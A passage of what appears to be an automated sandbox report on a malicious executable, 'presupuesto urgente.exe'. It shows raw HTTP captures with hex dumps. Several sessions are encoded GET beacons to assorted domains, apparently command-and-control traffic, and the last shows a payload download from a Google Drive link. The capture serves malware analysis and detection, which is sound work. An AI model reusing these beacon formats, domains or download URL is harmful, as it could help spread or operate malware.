                                                                                                                                                    Oct 4, 2024 12:04:50.872510910 CEST1189INData Raw: 36 2d 32 30 2e 32 33 33 2c 31 39 2e 34 31 38 31 31 2d 32 30 2e 32 33 33 73 31 39 2e 34 32 31 34 38 2c 38 2e 36 31 35 31 2c 31 39 2e 34 32 31 34 38 2c 32 30 2e 32 33 33 56 31 33 30 2e 35 31 38 43 38 31 38 2e 39 38 30 37 2c 31 34 32 2e 31 33 39 36
                                                                                                                                                    Data Ascii: 6-20.233,19.41811-20.233s19.42148,8.6151,19.42148,20.233V130.518C818.9807,142.13962,812.314,150.74765,799.55922,150.74765Zm8.69383-26.81055c0-6.66-3.00617-10.97058-8.69383-10.97058-5.68732,0-8.69382,4.31058-8.69382,10.97058V130.518c0,6.66336,3


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    88192.168.11.2049829199.192.19.1980
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:04:57.359771967 CEST426OUTGET /44em/?PbG=iGO2pBA+GdZFzSp95ITiNE0UdXGz/GDPPTuDgRXb9x0A8cbI0BsffOr86U/ry5cw9/6dj1rDQbqcJPAE3iEy6ACI9UEhGVzT4hJYYQarhHeSOj2eWmeo6uY=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.stayvact.xyz
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:04:57.557590008 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:04:57 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Content-Length: 16026
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:04:57.557605028 CEST1289INData Raw: 33 30 31 2c 33 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33
                                                                                                                                                    Data Ascii: 301,3.5 s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,
                                                                                                                                                    Oct 4, 2024 12:04:57.557689905 CEST1289INData Raw: 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 0a 20 20
                                                                                                                                                    Data Ascii: city="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149" /> </g>
                                                                                                                                                    Oct 4, 2024 12:04:57.557703972 CEST1289INData Raw: 20 20 20 20 20 20 20 78 31 3d 22 33 32 30 2e 31 33 35 22 20 79 31 3d 22 31 33 32 2e 37 34 36 22 20 78 32 3d 22 33 32 30 2e 31 33 35 22 20 79 32 3d 22 31 35 33 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                                                                    Data Ascii: x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="1
                                                                                                                                                    Oct 4, 2024 12:04:57.558135033 CEST1289INData Raw: 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 34 38 39 2e 35 35 35 22 20 79 31 3d 22 32 39 39 2e 37 36 35 22 20 78 32 3d 22 34 38 39 2e 35 35 35 22 20 79 32 3d
                                                                                                                                                    Data Ascii: oke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636
                                                                                                                                                    Oct 4, 2024 12:04:57.558149099 CEST1289INData Raw: 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 31 38 36 2e 33 35 39 22 20 79 31 3d 22 34 30 36 2e 39 36 37 22 20 78 32 3d 22 31 38 36 2e 33 35 39 22 20 79 32 3d 22 34 31 35 2e 33 32 36 22 20 2f 3e 0a 0a 20 20
                                                                                                                                                    Data Ascii: 10" x1="186.359" y1="406.967" x2="186.359" y2="415.326" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="190.277" y1="411.146" x
                                                                                                                                                    Oct 4, 2024 12:04:57.558245897 CEST1289INData Raw: 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69
                                                                                                                                                    Data Ascii: > <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="429.522" cy="201.185" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width=
                                                                                                                                                    Oct 4, 2024 12:04:57.558377981 CEST1289INData Raw: 79 3d 22 35 33 30 2e 39 32 33 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 31 33 30 2e 36 39 33 22 20 63 79 3d 22 33
                                                                                                                                                    Data Ascii: y="530.923" r="2.651" /> <circle fill="#0E0620" cx="130.693" cy="305.608" r="2.651" /> <circle fill="#0E0620" cx="480.296" cy="477.014" r="2.651" /> </g> </g> <g id="spacema
                                                                                                                                                    Oct 4, 2024 12:04:57.558500051 CEST1289INData Raw: 6d 69 74 3d 22 31 30 22 20 78 31 3d 22 33 32 33 2e 33 39 36 22 20 79 31 3d 22 32 33 36 2e 36 32 35 22 20 78 32 3d 22 32 39 35 2e 32 38 35 22 20 79 32 3d 22 33 35 33 2e 37 35 33 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63
                                                                                                                                                    Data Ascii: mit="10" x1="323.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx="323.666" cy="2
                                                                                                                                                    Oct 4, 2024 12:04:57.558515072 CEST1289INData Raw: 09 09 09 4d 33 30 31 2e 33 30 31 2c 33 34 37 2e 36 36 63 2d 31 2e 37 30 32 2c 30 2e 32 34 32 2d 35 2e 39 31 2c 31 2e 36 32 37 2d 37 2e 34 39 32 2c 32 2e 35 33 36 6c 2d 34 37 2e 39 36 35 2c 32 37 2e 33 30 31 63 2d 36 2e 36 36 34 2c 33 2e 38 32 39
                                                                                                                                                    Data Ascii: M301.301,347.66c-1.702,0.242-5.91,1.627-7.492,2.536l-47.965,27.301c-6.664,3.829-8.963,12.335-5.134,18.999h0c3.829,6.664,12.335,8.963,18.999,5.134l9.685-5.564" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" s
                                                                                                                                                    Oct 4, 2024 12:04:57.741853952 CEST1289INData Raw: 36 39 2e 36 37 38 2c 33 39 34 2e 39 31 32 4c 32 36 39 2e 36 37 38 2c 33 39 34 2e 39 31 32 63 32 36 2e 33 2c 32 30 2e 36 34 33 2c 35 39 2e 36 35 34 2c 32 39 2e 35 38 35 2c 39 33 2e 31 30 36 2c 32 35 2e 37 32 34 6c 32 2e 34 31 39 2d 30 2e 31 31 34
                                                                                                                                                    Data Ascii: 69.678,394.912L269.678,394.912c26.3,20.643,59.654,29.585,93.106,25.724l2.419-0.114" /> </g> <g id="legs"> <g id="legR"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" strok


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    89192.168.11.204983013.248.169.4880
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:05:02.863312960 CEST432OUTGET /9ned/?PbG=90J5hnkKMqWm95EdODHVgYU8jLlSuqUZOgFf/iPIyrVqxOp5uDPGdLjydK5bectxsy3BttRl3YyLMg8JhxE3vKKk0eEfvV9KpYS9gdBpjJtDcC1yxudRBLM=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.sleephygienist.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:05:02.964819908 CEST397INHTTP/1.1 200 OK
                                                                                                                                                    Server: openresty
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:05:02 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 257
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 50 62 47 3d 39 30 4a 35 68 6e 6b 4b 4d 71 57 6d 39 35 45 64 4f 44 48 56 67 59 55 38 6a 4c 6c 53 75 71 55 5a 4f 67 46 66 2f 69 50 49 79 72 56 71 78 4f 70 35 75 44 50 47 64 4c 6a 79 64 4b 35 62 65 63 74 78 73 79 33 42 74 74 52 6c 33 59 79 4c 4d 67 38 4a 68 78 45 33 76 4b 4b 6b 30 65 45 66 76 56 39 4b 70 59 53 39 67 64 42 70 6a 4a 74 44 63 43 31 79 78 75 64 52 42 4c 4d 3d 26 6d 32 57 34 79 3d 65 4c 71 50 33 7a 53 70 66 44 54 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?PbG=90J5hnkKMqWm95EdODHVgYU8jLlSuqUZOgFf/iPIyrVqxOp5uDPGdLjydK5bectxsy3BttRl3YyLMg8JhxE3vKKk0eEfvV9KpYS9gdBpjJtDcC1yxudRBLM=&m2W4y=eLqP3zSpfDT"}</script></head></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    90192.168.11.204983143.252.167.18880
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:05:08.283977032 CEST434OUTGET /y6iz/?PbG=zhQ7Ngng1ztc3XJZIHU9Y/47AI96U2d0+kXKRZ9IAQQLMCXY95UFdstJ1SRqr3k6kIeJ8f3iCIfwSA0tHDQugE4jqofP6h0k5CYKv8JwRObuJO4PUIsN08g=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.xn--fhq1c541j0zr.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:05:08.587613106 CEST367INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:14:52 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Content-Length: 203
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 36 69 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    91192.168.11.204983231.217.192.15880
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:05:13.801783085 CEST429OUTGET /h9tv/?PbG=uYvkJTgHEMDqnDyAL7Bx5kFK4VB5WoBnzEJCknt6lKw0HVhBOb4vRoriyZLI8rcuBPdsMwWdB0wPJQDcXjXv1IKIZ3835bSH0Rj2yj0ArB004lLFoiTrAbQ=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.jennarauten.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:05:14.457730055 CEST526INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    Connection: close
                                                                                                                                                    x-powered-by: PHP/8.3.11
                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                    x-redirect-by: WordPress - Really Simple Security
                                                                                                                                                    location: https://www.jennarauten.com/h9tv/?PbG=uYvkJTgHEMDqnDyAL7Bx5kFK4VB5WoBnzEJCknt6lKw0HVhBOb4vRoriyZLI8rcuBPdsMwWdB0wPJQDcXjXv1IKIZ3835bSH0Rj2yj0ArB004lLFoiTrAbQ=&m2W4y=eLqP3zSpfDT
                                                                                                                                                    content-length: 0
                                                                                                                                                    date: Fri, 04 Oct 2024 10:04:24 GMT
                                                                                                                                                    server: LiteSpeed


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    92192.168.11.2049833191.101.104.16480
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:05:19.627696037 CEST428OUTGET /6s2u/?PbG=LwMCxBNtIktrMj9PGQiKtMV+LJeqJuCob/kDIT9BHmAZvs3jLOO+ZrbeOg0/fIrrzLQ8oyXz+hXEDm3lfyah8CLsJZYqemFEXJ3vaUcAfohhzVyFGy0IUEQ=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.taketechai.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:05:20.342416048 CEST1289INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    Server: hcdn
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:05:20 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 795
                                                                                                                                                    Connection: close
                                                                                                                                                    location: https://www.taketechai.com/6s2u/?PbG=LwMCxBNtIktrMj9PGQiKtMV+LJeqJuCob/kDIT9BHmAZvs3jLOO+ZrbeOg0/fIrrzLQ8oyXz+hXEDm3lfyah8CLsJZYqemFEXJ3vaUcAfohhzVyFGy0IUEQ=&m2W4y=eLqP3zSpfDT
                                                                                                                                                    platform: hostinger
                                                                                                                                                    panel: hpanel
                                                                                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    x-hcdn-request-id: e714f60609f56eb3b9225ad9040d36af-phx-edge4
                                                                                                                                                    x-hcdn-cache-status: MISS
                                                                                                                                                    x-hcdn-upstream-rt: 0.561
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h
                                                                                                                                                    Oct 4, 2024 12:05:20.342427969 CEST78INData Raw: 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: 2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    93192.168.11.2049834162.255.119.15080
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:05:25.464319944 CEST432OUTGET /ko0y/?PbG=Gn25S248vYwvg7Jg7plpNM/IO+qTcMdG7TQwLne03JpgtwdJKoWqeQtwalLznrJvxBqGQBXIB3Hty1ARVLJ66f5Bip3WtEch+Xr1s5xY01AltpXHCM6v1G8=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.297tamatest1kb.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:05:25.578280926 CEST1173INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:05:25 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Content-Length: 976
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Served-By: Namecheap URL Forward
                                                                                                                                                    Server: namecheap-nginx
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 46 72 61 6d 65 73 65 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 66 72 61 6d 65 73 65 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 63 6f 6e 74 65 6e 74 2d 74 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4b 45 59 57 4f 52 44 53 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 44 45 53 43 52 49 50 54 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 56 45 52 53 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"><html> <head> <meta http-equiv='content-type' content='text/html; charset=UTF-8'> <meta name="KEYWORDS" content=""> <meta name="DESCRIPTION" content=""> <meta name="VERSION" content=""> <link href="" rel="shortcut icon" type="image/x-icon"> <title></title> </head> <frameset rows='100%, *' frameborder=no framespacing=0 border=0> <frame src="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame> </frameset> <noframes> <h2>Your browser does not support frames. We recommend upgrading your browser.</h2><br><br> <center>Click <a href="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" >here</a> to enter the site.</center> </noframes></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    94192.168.11.204983591.195.240.1980
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:05:41.122004986 CEST429OUTGET /w8xy/?PbG=9uM5b9ZGQ2xGa/fVJtRXtYM44dIY5ZCO55UnrVzGgcPFgg1e058W5kaq/wWnc0Jau7/b/2o64CBh5aGCaOFYcZtnKviijE7Q36m7HNpI4xddvmt+atSlTsw=&1X=S8wx1XUpNBuXlv_ HTTP/1.1
                                                                                                                                                    Host: www.gipsytroya.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:05:41.308866024 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    0192.168.11.2049730142.251.40.1744436412C:\Users\user\Desktop\presupuesto urgente.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-04 09:57:17 UTC216OUTGET /uc?export=download&id=1lijlSqItQAppMrLvYydriCj6BfDO7ozU HTTP/1.1
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
